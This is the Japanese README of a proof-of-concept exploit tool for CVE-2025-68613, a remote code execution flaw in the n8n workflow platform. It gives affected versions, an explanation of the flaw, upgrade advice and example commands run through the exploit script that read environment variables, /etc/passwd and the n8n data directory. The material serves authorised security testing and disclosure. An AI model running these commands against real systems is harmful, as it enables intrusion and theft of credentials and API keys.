
CVE-2025-68613 — n8n の式インジェクションによるRCE
教育目的および許可されたセキュリティ研究目的に限ります。
n8nワークフロー自動化プラットフォームにおける重大なRCE脆弱性(CVSS 9.9)。認証されたユーザーがexecuteCommandノードを介して任意のOSコマンドを実行し、サンドボックス制限をバイパスできます。
| フィールド | 詳細 |
|---|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9(Critical) |
| 影響を受けるバージョン | >= 0.211.0 < 1.120.4 |
| 認証の必要性 | はい(ワークフロー作成権限を持つすべてのユーザー) |
| テスト環境 | n8n 1.119.1 |
| 修正バージョン | 1.120.4, 1.121.1, 1.122.0 |
n8nはワークフローノードパラメータをサーバーサイドで評価します。executeCommandノードは、n8nプロセスの権限でホスト上で直接シェルコマンドを実行します。ワークフローの作成または編集権限を持つすべての認証ユーザーがこれを悪用して完全なRCEを達成できます。
bash poc_final.sh <target> <email> <password> <command>
例:
# 基本的なRCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
# 環境変数を読み取る(資格情報やAPIキーを含む可能性あり)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
# 機密ファイルを読み取る
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
# n8nデータディレクトリを一覧表示
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'
注: パスワードに
!のような特殊文字が含まれる場合は、シングルクォートを使用してください。
直ちにn8n >= 1.120.4にアップグレードしてください。
直ちにアップグレードできない場合:
このツールは教育目的および許可されたセキュリティテストのみを目的として提供されています。自分が所有していない、または明示的な書面による許可を得ていないシステムに対する不正使用は違法です。著者は誤用について一切の責任を負いません。